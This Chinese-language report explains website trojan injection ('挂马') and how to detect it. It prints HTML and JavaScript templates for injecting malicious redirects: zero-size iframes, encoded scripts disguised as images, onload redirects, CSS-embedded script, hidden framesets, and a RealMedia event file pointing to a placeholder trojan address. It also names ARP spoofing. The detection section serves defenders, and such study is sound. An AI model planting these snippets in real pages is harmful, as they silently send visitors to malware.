网站挂马及检测技术

挂马与检测技术报告
什么是挂马？
所谓的挂马，就是黑客通过各种手段，包括SQL注入，敏感文件扫描，服务器漏洞，程序0day, 等各种方法获得管理员账号，然后登陆后台，通过数据库备份/恢复或者上传漏洞获得一个webshell。

利用获得的webshell修改页面的容，向页面中加入恶意转向代码。

也可以直接通过弱口令获得服务器或者FTP，然后直接对页面直接进行修改。

当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。

挂马的危害
危害和应用的普及程度有关，上网人人都会，也就是说，人人都可能中毒。

据金山毒霸安全实验室统计，每天有数百万次浏览与挂马网页有关，中毒概率在20%-50%之间。

很多游戏被挂马，黑客目的就是盗取浏览该玩家的游戏账号，而那些大型被挂马，则是为了搜集大量的肉鸡。

被挂马不仅会让自己的失去信誉，丢失大量客户，也会让我们这些普通用户陷入黑客设下的陷阱，沦为黑客的肉鸡。

如果不小心进入了已被挂马的，则会感染木马病毒，以致丢失大量的宝贵文件资料和账号密码，其危害极大。

挂马泛滥的原因
利。

病毒木马黑色产业链有丰厚的利润，去年警方抓获的大小姐系列木马案，犯罪集团3个月获得非常收益3000万。

网络应用越普及，黑色产业链的从业者收益也就越高。

挂马围
哪些容易被挂马呢？越是流量高的对黑客越有吸引力，黑客攻破一个管理上有漏洞并且流量很高的，一天就可以感染数百万人。

那些与公共事业密切相关的，比如政府机关的，，视频，聊天交友，提供盗版软件破解工具的最容易被入侵，几乎每周出现的热点网络事件都被攻击者利用，网民一不小心就会受热门事件吸引中招。

挂马的常见方式
1.框架挂马
<iframe src=地址 width=0 height=0></iframe>
其中“地址”处可以输入恶意等。

属性为0意味着该框架是不可见的，受害者若不查看源代码很难发现网页木马。

这个方法也是挂马最常用的一段代码，但是随着管理员和广大网民安全意识的提高，只要在源代码中搜索iframe这个关键字，就很容易找到网页木马的源头。

2.js文件挂马
只要是JS文件，都可以通过被恶意修改从而被挂上恶意代码，一般被全站引用的JS 代码最容易被挂木马，检测我们可以查看JS代码的左边或下边，坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏，所以要多看看JS代码页面有没有被故意拉长等。

相比iframe这个标签，<SCRIPT src="xx.js" type=text/javascript>这段代码就显得更加隐蔽，因为几乎95%的网页中都会出现类似的script 标签。

利用js引入网页木马也有多种方法：
在js中直接写出框架网页木马
示例代码如下：
document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>")；
指定language的属性为"JScript.Encode"
还可以引入其他扩展名的js代码，这样就更加具有迷惑性，示例代码如下：
<SCRIPT language="JScript.Encode" src=. xxx./mm.jpg></script>；
利用js更改body的innerHTML属性，引入网页木马
如果对容进行编码的话，不但能绕过杀毒软件的检测，而且增加了解密的难度，示例代码如下：
op.document.body.innerHTML=top.document.body.innerHTML+'\r\n
<iframe src="网页木马地址/%22%3E%3C/iframe%3E'；
利用JavaScript的window.open方法打开一个不可见的新窗口
示例代码如下：
<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1" );
</script>；
利用URL欺骗
示例代码如下：
a href=".163.(/迷惑用户的地址，显示这个地址指向木马地址)" onMouseOver="_163_(); return true;"> 页面要显示的正常容</a>：
<SCRIPT Language="JavaScript">
function _163_ ()
{
var url="网页木马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=n o,
scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10" );
}
</SCRIPT>
3.body挂马
使用如下代码，就可以使网页在加载完成的时候跳转到网页木马的网址
<body onload="window.location='网页木马地址';"></body>。

4.css中挂马
利用层叠样式表CSS引入js，从而引入网页木马，示例代码如下：
body{background-image:url('javascript:document.write("<script
src=/muma.js></script>")')}
这种方式比较难发现。

5.图片伪装
随着防毒技术的发展，黑客手段也不停地更新，图片木马技术逃避杀毒监视的新技术，攻击者将类似： .xxx./test.htm中的木马代码植入到test.gif图片文件中，这些嵌入代码的图片都可以用工具生成，攻击者只需输入相关的选项就可以了，如图3。

图片木马生成后，再利用代码调用执行，是比较新颖的一种挂马隐蔽方法，实例代码如：
<html>
<iframe src=".xxx./test.htm" height=0 width=0> </iframe>
<img src=".xxx./test.jpg"></center>
</html>
注：当用户打开www.xxx./test.htm是，显示给用户的是www.xxx./test.jpg，而
www.xxx./test.htm网页代码也随之运行。

6.利用隐藏的分割框架引入网页木马
示例代码如下：
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
7.在swf中挂马
网上有一些swf挂马的工具，可以用工具替换原来网页中的swf或单独把swf发给对方，一可以单独作一个可显示swf页的网页。

在网页中插入swf的语法一般格式为：
<OBJECT
classid=clsid:D27CDB6E-AE6D-11cf-96B8-0
codebase=download.macromedia./pub/shockwave/cabs/flash/swflash.cab#version=5.0.
0.0 WIDTH=760 NAME=quality VALUE=high>
<EMBED
src=/xxx.swf”
quality=high
pluginspage=.macromedia./shockwave/download/index.cgi?P1_Prod_Version=Shockwave Flash
type=application/x-shockwave-flash width=760 height=60>
</EMBED>
</OBJECT>
8.在影音文件中挂马
所需工具是RealMedia Editor，打开工具后，然后依次选择“文件”-“打开Real媒体文件”，然后选择需要编辑的视频文件，其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。

接着，新建一个文本，在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal& .xxx./horse.htm ;(00:00:10.0就是发生第一事件的时间，这里是让计算机弹出网页;00:00:30.0同样，这是第二次发生的时间，在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。

)
输入完毕后并保存，然后依次选择“工具”-“合并事件”，导入刚才的文本。

当合并完成后，依次选择“文本”-“Real文件另存为”，保存好即可。

最后把生成的视频文件发布网上，当对方观看同时就会连接到你指定的木马地址。

9.通过钓鱼挂马
黑客伪造，并在钓鱼上插入恶意代码下载木马。

10.ARP挂马
并不需要真正攻陷目标：知名通常防护严密。

ARP欺骗：对同一以太网网段中，通过ARP欺骗方法进行中间人攻击，
可劫持指定网络流量并进行任意修改
ARP欺骗挂马:在Web请求反馈页面中插入iframe等重定向代码，从
而使得目标被“虚拟”挂马
挂马的检测方式
1.特征匹配
文本文件型病毒的特征码是从它的代码中提取一处或多处此病毒特有的字符串作为病毒文件的特征，只要这些字符串稍有变化，病毒的特征也就变化了，则必须增加病毒的特征记录。

例如，eval(“＼151＼146”)，这段javascript代码提取病毒特征码的办法是提取eval或＼151＼146作为特征标识，当eval函数中代码发生1次变化时，特征病毒库就要增加l条特征记录，这往往会导致病毒库过大，并且一旦病毒进行了变形，将无法用特征库检测出来。

2.虚拟机检测
采用虚拟机的方法，在虚拟机中安装真实的操作系统，使用IE浏览器浏览网页，进行
网页行为检测，根据监控到的系统动态行为判定客户端蜜罐系统是否被攻击并植入木马，从而确定网页是否被挂马。

3.检测网页嵌的url
通过对网页嵌的url进行判断，看是否为脚本或可执行文件。

如果是，则很有可能是木马。

网页可标记为可疑可以网页。

有的网页代码是经过加密的，所以要对加密混淆的恶意网页进行识别和解密。

然后对解密后网页代码进行特征匹配，从而检测出网页木马。

显然此处的核心问题就是解密，常见解密方法如下：
●根据已知编码/加密方法，构建相应的解码/解密程序
●浏览器动态执行解密技术
●基于Javascipt/VBScript等脚本语言解析引擎进行动态执行，从而对加密脚本进
行解密。